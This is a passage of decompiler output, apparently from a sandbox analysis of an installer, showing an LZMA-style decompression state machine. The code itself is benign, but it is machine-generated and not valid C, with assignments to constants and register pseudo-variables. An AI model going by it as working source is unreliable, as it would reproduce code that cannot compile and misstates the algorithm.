									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004074FE))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
